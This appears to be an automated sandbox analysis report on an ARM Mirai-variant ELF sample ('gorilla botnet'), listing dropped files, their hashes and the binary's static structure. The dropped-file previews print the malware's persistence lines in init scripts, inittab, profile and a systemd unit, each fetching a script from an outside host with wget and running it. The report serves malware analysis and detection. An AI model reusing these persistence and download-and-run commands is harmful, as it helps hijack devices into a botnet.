                                                                                7MxrefODr5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  pO9NAGXywW.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    U8JEOF0Yx7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      arm5.nn.elfGet hashmaliciousUnknownBrowse
                                                                                        arm.nn.elfGet hashmaliciousUnknownBrowse
                                                                                          m68k.nn.elfGet hashmaliciousMiraiBrowse
                                                                                            mips.nn.elfGet hashmaliciousUnknownBrowse
                                                                                              arm7.nn.elfGet hashmaliciousMiraiBrowse

                                                                                                Created / dropped Files

                                                                                                /boot/bootcmd

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):131
                                                                                                Entropy (8bit):4.651262329620505
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:KPJRXVH12FDDoCQALjWQegRILbaaFOdFXa5O:WJR/2dorwFCbaaeXCO
                                                                                                MD5:1A19F374683843F834AD5D18944098D8
                                                                                                SHA1:CAF89F148A69EE49D8E7D5A4098518ACA1B6ADF1
                                                                                                SHA-256:900AA812700E2D8B117DDBFDAF167F05D75068798A8A4C077E15E86B153CE3CF
                                                                                                SHA-512:8F61F96718E1F7BF6DCDF99DC180C21C49B1A1061DB4BB9B4005FFE57A2537CEAD41F89F62209BB70BB054F106BE38AD6864AECE9B3A1E3F6DFAB52490E46F34
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:run bootcmd_mmc0; /tmp/tVdq8lEt3e.elf && wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

                                                                                                /etc/init.d/mybinary

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                                Category:dropped
                                                                                                Size (bytes):118
                                                                                                Entropy (8bit):4.639943975639802
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:TKH4vZKVH12FDvSDRFbALjWQegRILpaKB0dFLoKE0:h8/2xSXbwFCzBeLXE0
                                                                                                MD5:F5AA55C27155B4D30FEB9EBAFA5A10B2
                                                                                                SHA1:1F9C3F9F0528E513B5E68032648CBA766959B082
                                                                                                SHA-256:E4A919DE7B2A0B788B3FD37E192183A9768D1F87C0552A2B6BC8BFAEC3FCF3FB
                                                                                                SHA-512:F722C86D9EC9C6E14802647BEF3E70EAA9EF838C518412E8BDCF1C3425C6561031A04DCC86ACDFA9531F68745FB1DC8B2BFBA96922599006260BAB019E90005E
                                                                                                Malicious:true
                                                                                                Reputation:low
                                                                                                Preview:#!/bin/sh./tmp/tVdq8lEt3e.elf &.wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

                                                                                                /etc/init.d/tVdq8lEt3e.elf

                                                                                                Download File
                                                                                                Process:/bin/sh
                                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                                Category:dropped
                                                                                                Size (bytes):438
                                                                                                Entropy (8bit):4.617111005753294
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:QRkxS/NxkjCvdpgUJgjvM/jCvQFOmKNydSRucSOyd3:uLIJ4SYOM3
                                                                                                MD5:C16C859101E051338798AE012BEF6711
                                                                                                SHA1:FD9228B357AAC76557B55DC84BBA0EFB5E169335
                                                                                                SHA-256:CC4C3777658FA2822B8FA3B1104E406A00420AC38AD02FCFDE7BB40FB3EDA598
                                                                                                SHA-512:38689DBBA29504AC49080CD996C7A1C191D6BEE3C8953010A488CB83F118DC46A3D6DC4246AEBD38295B7D33D4348CCAD84D5D3D5AC6A47A70E4E2EA60B8C312
                                                                                                Malicious:true
                                                                                                Reputation:low
                                                                                                Preview:#!/bin/sh.# /etc/init.d/tVdq8lEt3e.elf..case "" in. start). echo 'Starting tVdq8lEt3e.elf'. /tmp/tVdq8lEt3e.elf &. wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping tVdq8lEt3e.elf'. killall tVdq8lEt3e.elf. ;;. restart). /bin/sh stop. /bin/sh start. ;;. *). echo "Usage: /bin/sh {start|stop|restart}". exit 1. ;;.esac.exit 0.

                                                                                                /etc/inittab

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):123
                                                                                                Entropy (8bit):4.564137232954873
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:nAWu5zH12FDDoCQALjWQegRILbaaFOdFXa5O:A32dorwFCbaaeXCO
                                                                                                MD5:963027824AE948BA2D3D2C58ABF777C3
                                                                                                SHA1:97225C2CE07FD3D30F691959E3D085096E2FEFAB
                                                                                                SHA-256:D3FFC3B4E0432B02AA185247D32A391DD6BB99CD8385232616E004DDB1841D37
                                                                                                SHA-512:DA1AFE5BA824659F4227755441275679AD682600494A0ADE902405015E2001DF5936A8A2677BAA770415D8C994FFFC7F91DBB220503A79A3F568E20301E4E50C
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:::respawn:/tmp/tVdq8lEt3e.elf && wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

                                                                                                /etc/motd

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):53
                                                                                                Entropy (8bit):3.871459242626451
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                                MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                                SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                                SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                                SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:gorilla botnet is on the device ur not a cat go away.

                                                                                                /etc/profile

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):114
                                                                                                Entropy (8bit):4.511624597126292
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:TgVH12FDvSDRFbALjWQegRILbaaFOdFXa50:Tg/2xSXbwFCbaaeXC0
                                                                                                MD5:A1A45F7680395A1DA1288F99B979DD45
                                                                                                SHA1:16480895D6718686364035E92EE905AAE7AD970E
                                                                                                SHA-256:4D88F6425D335345E0AD26DD701A87C631F7B5092F426F3A7F03F9B24D1ACDAA
                                                                                                SHA-512:A019174A1D5C40B94CD5FA63B349602DE099E86E652C5DAA1381B6A382DADAC43CC2E62CB55826EB9EA5806CC54FEB191C12D33B8F0C281CA4183D719FD1415C
                                                                                                Malicious:true
                                                                                                Reputation:low
                                                                                                Preview:/tmp/tVdq8lEt3e.elf &.wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

                                                                                                /etc/rc.local

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                                Category:dropped
                                                                                                Size (bytes):10
                                                                                                Entropy (8bit):3.121928094887362
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:TKH4vn:hv
                                                                                                MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                                                SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                                                SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                                                SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: GTWXkCrjA1.elf, Detection: malicious, Browse
                                                                                                • Filename: jMMTZcFBa8.elf, Detection: malicious, Browse
                                                                                                • Filename: 7MxrefODr5.elf, Detection: malicious, Browse
                                                                                                • Filename: pO9NAGXywW.elf, Detection: malicious, Browse
                                                                                                • Filename: U8JEOF0Yx7.elf, Detection: malicious, Browse
                                                                                                • Filename: arm5.nn.elf, Detection: malicious, Browse
                                                                                                • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                                                • Filename: m68k.nn.elf, Detection: malicious, Browse
                                                                                                • Filename: mips.nn.elf, Detection: malicious, Browse
                                                                                                • Filename: arm7.nn.elf, Detection: malicious, Browse
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:#!/bin/sh.

                                                                                                /etc/systemd/system/custom.service

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):312
                                                                                                Entropy (8bit):4.951805934567628
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:z8ifitRZAMzdK+j2s2+GWRd4wm+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+SB+GWRddm+GWRXY+GWRuL6
                                                                                                MD5:C7AF6A5BC0AA7568A864FD4021801F68
                                                                                                SHA1:CBE1426410C84CCBB0859B35AFC208DC28814BD7
                                                                                                SHA-256:93FC20929F1D2B157F44824D5E00725FAD1B95FBCCC5168E52D62AAE8D3D3002
                                                                                                SHA-512:44665A5F9B49DE526A72956F2DBA52CB7701C8ECB7BACB4314413948020EF4C32F564512497E684B6EC8CE33CEE671E4BE70C9428C9091EC7CA7E9CD316040A2
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/tVdq8lEt3e.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://pen.gorillafirewall.su/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

                                                                                                /memfd:snapd-env-generator (deleted)

                                                                                                Download File
                                                                                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):76
                                                                                                Entropy (8bit):3.7627880354948586
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

                                                                                                /tmp/qemu-open.eRZguB (deleted)

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):274
                                                                                                Entropy (8bit):3.5964813510024203
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:M6gDFo2p/VU8VbsDFo2/MxgY/VjmsVot/VOArB/VH:3YH4EbEHEGl
                                                                                                MD5:F05C405721B00B221C0454106F7EABED
                                                                                                SHA1:5FD6D12826E7D903F7313FFAE0C4EF42560F1204
                                                                                                SHA-256:5A7B38A1F1B65429BABA56F2E55FBD1710EA675EC263ED6B4EAED594B63AC39F
                                                                                                SHA-512:6BC15855A2AA36D4E623AA0E1569D51D9E1EF187997B04F6C5AADAB694EC7E2E18154E7061195FB0F30FB7589DA13CBC93438A76C62AEB2F2391B0B377C51B58
                                                                                                Malicious:false
                                                                                                Preview:8000-22000 r-xp 00000000 fd:00 531606 /tmp/tVdq8lEt3e.elf.2a000-2b000 rw-p 0001a000 fd:00 531606 /tmp/tVdq8lEt3e.elf.2b000-2f000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].

                                                                                                /tmp/qemu-open.uZ0VNC (deleted)

                                                                                                Download File
                                                                                                Process:/tmp/tVdq8lEt3e.elf
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):20
                                                                                                Entropy (8bit):3.7841837197791888
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:TgVH12ln:Tg/2l
                                                                                                MD5:159766F5049DF690A9DC482D5F155AA7
                                                                                                SHA1:1EB8475127B3D949D46242163C8062919AB14D43
                                                                                                SHA-256:432E5D2586E004035D14939B860AE0FC93407083E4679A56B1C3EB6A171EDAB4
                                                                                                SHA-512:83F63D118DEB614871007C604D55991A3A4FC4E778DC8A096346AAA9127161E7968CD11CA90BEFA203DCF949317B92C044FE0DA55506B1922A346455B5FDD81B
                                                                                                Malicious:false
                                                                                                Preview:/tmp/tVdq8lEt3e.elf.

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
                                                                                                Entropy (8bit):6.017157938862243
                                                                                                TrID:
                                                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                File name:tVdq8lEt3e.elf
                                                                                                File size:170'094 bytes
                                                                                                MD5:c42ba46f2b693cfe8b9ce093e62d5844
                                                                                                SHA1:f75f1265592f74362a6167061ad33a7627abcdc0
                                                                                                SHA256:549627b2ba0ef60640456a03a70e46d4c45726443fd9ac4f48bddb8aab625c9b
                                                                                                SHA512:260c45c9f3b1abf162f52702d5608dc532efc2d0a4d123ec212a1f7f3be512dab7692a6868d732cf64b0d1822489043b8b63716fa2f54a4b05c5d2fa1ef39e0c
                                                                                                SSDEEP:3072:FfvK8PY8FxaEitYuSBFaxOPhHICpgD7hhanSLjM/96XmRwjq0r4:FfvKDixaEitYuSGxOPaRhaSfM/96XmRh
                                                                                                TLSH:2BF33C46E6818B13C4D62779BAEF424933239B64D3DB73059928BFB43F8679E0E23505
                                                                                                File Content Preview:.ELF..............(.........4...........4. ...(........ph...h...h... ... ...............................................................@3..........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                Static ELF Info

                                                                                                ELF header

                                                                                                Class:ELF32
                                                                                                Data:2's complement, little endian
                                                                                                Version:1 (current)
                                                                                                Machine:ARM
                                                                                                Version Number:0x1
                                                                                                Type:EXEC (Executable file)
                                                                                                OS/ABI:UNIX - System V
                                                                                                ABI Version:0
                                                                                                Entry Point Address:0x8194
                                                                                                Flags:0x4000002
                                                                                                ELF Header Size:52
                                                                                                Program Header Offset:52
                                                                                                Program Header Size:32
                                                                                                Number of Program Headers:5
                                                                                                Section Header Offset:134584
                                                                                                Section Header Size:40
                                                                                                Number of Section Headers:29
                                                                                                Header String Table Index:26

                                                                                                Sections

                                                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                NULL0x00x00x00x00x0000
                                                                                                .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                .textPROGBITS0x80f00xf00x16e5c0x00x6AX0016
                                                                                                .finiPROGBITS0x1ef4c0x16f4c0x100x00x6AX004
                                                                                                .rodataPROGBITS0x1ef600x16f600x2df00x00x2A008
                                                                                                .ARM.extabPROGBITS0x21d500x19d500x180x00x2A004
                                                                                                .ARM.exidxARM_EXIDX0x21d680x19d680x1200x00x82AL204
                                                                                                .eh_framePROGBITS0x2a0000x1a0000x40x00x3WA004
                                                                                                .tbssNOBITS0x2a0040x1a0040x80x00x403WAT004
                                                                                                .init_arrayINIT_ARRAY0x2a0040x1a0040x40x00x3WA004
                                                                                                .fini_arrayFINI_ARRAY0x2a0080x1a0080x40x00x3WA004
                                                                                                .jcrPROGBITS0x2a00c0x1a00c0x40x00x3WA004
                                                                                                .gotPROGBITS0x2a0100x1a0100xb00x40x3WA004
                                                                                                .dataPROGBITS0x2a0c00x1a0c00x2fc0x00x3WA004
                                                                                                .bssNOBITS0x2a3bc0x1a3bc0x2f840x00x3WA004
                                                                                                .commentPROGBITS0x00x1a3bc0xd720x00x0001
                                                                                                .debug_arangesPROGBITS0x00x1b1300x1400x00x0008
                                                                                                .debug_pubnamesPROGBITS0x00x1b2700x2130x00x0001
                                                                                                .debug_infoPROGBITS0x00x1b4830x20430x00x0001
                                                                                                .debug_abbrevPROGBITS0x00x1d4c60x6e20x00x0001
                                                                                                .debug_linePROGBITS0x00x1dba80xe760x00x0001
                                                                                                .debug_framePROGBITS0x00x1ea200x2b80x00x0004
                                                                                                .debug_strPROGBITS0x00x1ecd80x8ca0x10x30MS001
                                                                                                .debug_locPROGBITS0x00x1f5a20x118f0x00x0001
                                                                                                .debug_rangesPROGBITS0x00x207310x5580x00x0001
                                                                                                .ARM.attributesARM_ATTRIBUTES0x00x20c890x160x00x0001
                                                                                                .shstrtabSTRTAB0x00x20c9f0x1170x00x0001
                                                                                                .symtabSYMTAB0x00x212400x59800x100x0288314
                                                                                                .strtabSTRTAB0x00x26bc00x2cae0x00x0001

                                                                                                Program Segments

                                                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                EXIDX0x19d680x21d680x21d680x1200x1204.46010x4R 0x4.ARM.exidx
                                                                                                LOAD0x00x80000x80000x19e880x19e886.18180x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                LOAD0x1a0000x2a0000x2a0000x3bc0x33404.51330x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                                                                                                TLS0x1a0040x2a0040x2a0040x00x80.00000x4R 0x4.tbss
                                                                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                                                                Symbols

                                                                                                NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                                .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                .symtab0x80d40SECTION<unknown>DEFAULT1
                                                                                                .symtab0x80f00SECTION<unknown>DEFAULT2
                                                                                                .symtab0x1ef4c0SECTION<unknown>DEFAULT3
                                                                                                .symtab0x1ef600SECTION<unknown>DEFAULT4
                                                                                                .symtab0x21d500SECTION<unknown>DEFAULT5
                                                                                                .symtab0x21d680SECTION<unknown>DEFAULT6
                                                                                                .symtab0x2a0000SECTION<unknown>DEFAULT7
                                                                                                .symtab0x2a0040SECTION<unknown>DEFAULT8
                                                                                                .symtab0x2a0040SECTION<unknown>DEFAULT9
                                                                                                .symtab0x2a0080SECTION<unknown>DEFAULT10
                                                                                                .symtab0x2a00c0SECTION<unknown>DEFAULT11
                                                                                                .symtab0x2a0100SECTION<unknown>DEFAULT12
                                                                                                .symtab0x2a0c00SECTION<unknown>DEFAULT13
                                                                                                .symtab0x2a3bc0SECTION<unknown>DEFAULT14
                                                                                                .symtab0x00SECTION<unknown>DEFAULT15
                                                                                                .symtab0x00SECTION<unknown>DEFAULT16
                                                                                                .symtab0x00SECTION<unknown>DEFAULT17
                                                                                                .symtab0x00SECTION<unknown>DEFAULT18
                                                                                                .symtab0x00SECTION<unknown>DEFAULT19
                                                                                                .symtab0x00SECTION<unknown>DEFAULT20
                                                                                                .symtab0x00SECTION<unknown>DEFAULT21
                                                                                                .symtab0x00SECTION<unknown>DEFAULT22
                                                                                                .symtab0x00SECTION<unknown>DEFAULT23
                                                                                                .symtab0x00SECTION<unknown>DEFAULT24
                                                                                                .symtab0x00SECTION<unknown>DEFAULT25
                                                                                                $a.symtab0x80d40NOTYPE<unknown>DEFAULT1
                                                                                                $a.symtab0x1ef4c0NOTYPE<unknown>DEFAULT3
                                                                                                $a.symtab0x80e00NOTYPE<unknown>DEFAULT1
                                                                                                $a.symtab0x1ef580NOTYPE<unknown>DEFAULT3
                                                                                                $a.symtab0x80f00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x81340NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x81940NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x81d00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x82cc0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x84e80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x85540NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x85c40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x8b880NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x921c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x98380NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x9ad80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x9bf40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xa3a80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xaaa00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xb14c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xb8e80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xc1540NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xc4b00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xc6dc0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xc97c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xcbd80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xce300NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xd2440NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xd7300NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xd8e00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xdf640NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xdfb40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xe0580NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xe1040NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xe1a00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xe6dc0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xe8100NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xe9180NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xed3c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xee340NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xf73c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xff500NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0xffc00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1002c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x100bc0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x101f00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10d300NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10d600NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10d880NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10dd00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10df40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10e180NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10eac0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x10fe80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x111d40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x115980NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x116ac0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x116c00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x117580NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1184c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x118840NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x118c40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x119c40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x119ec0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11a000NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11ae00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11b180NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11b5c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11b9c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11be00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11c640NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11ca40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11d300NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11d700NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11da00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11de00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11ef00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11f240NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x11ff40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x120b80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x121680NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x122500NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x122f80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x123180NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1234c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1267c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1269c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x127100NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1275c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1278c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x127bc0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x127f00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x128c00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x12d200NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x12da00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x12f040NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x12f340NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x130780NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x138440NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x138e40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x139280NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x13ad80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x13b2c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1409c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x141b80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x142d40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x144000NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x146b00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14a5c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14afc0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14b340NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14bf00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14c000NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14c100NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14cb00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14cd00NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14d300NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14d580NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14d7c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14e480NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14e980NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14f940NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x14fac0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x150b80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x151240NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x151480NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x151c40NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x154bc0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x1560c0NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x158a80NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x159500NOTYPE<unknown>DEFAULT2
                                                                                                $a.symtab0x159780NOTYPE<unknown>DEFAULT2
